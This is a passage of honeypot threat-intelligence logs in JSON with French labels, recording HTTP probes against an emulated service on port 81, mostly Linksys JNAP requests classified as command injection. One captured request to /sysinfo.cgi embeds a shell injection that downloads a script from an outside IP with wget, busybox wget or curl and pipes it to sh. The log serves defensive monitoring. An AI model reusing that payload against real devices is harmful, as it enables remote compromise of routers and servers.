\u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/network\/Diagnostics\\r\\nContent-Length: 269\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/network\/Diagnostics\\\u0022,\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/network\/Diagnostics\\r\\nContent-Length: 269\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/network\/Diagnostics\\\u0022,\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022012dc757b37001ba1f8e4453cec504687c85a127\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 11 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":461},{"id":11860753,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59762,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":66,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 440, \u0022payload_entropy\u0022: 5.380811683452353, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022945a99d6bd486f2859e2e05cd8fd2a4513ab46fb\u0022, \u0022event_fingerprint\u0022: \u002295f10306677b4c8a86d0a637725f6b67be418db1\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002279bddce2030ef8b55783919edee82326\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\r\\nContent-Length: 251\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\\u0022,\\\u0022comma\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\r\\nContent-Length: 251\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\\u0022,\\\u0022comma\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00228f1e202557594a38868717bd82a9873b0e4d1349\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":440},{"id":11860754,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59776,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":41,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00225e0ad868dd3c13dd4457bba7c1746b5834f6cce3\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 283, \u0022payload_entropy\u0022: 5.104542856658591, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022be537592b59bcfad4c2d0587bf077c154d7907c2\u0022, 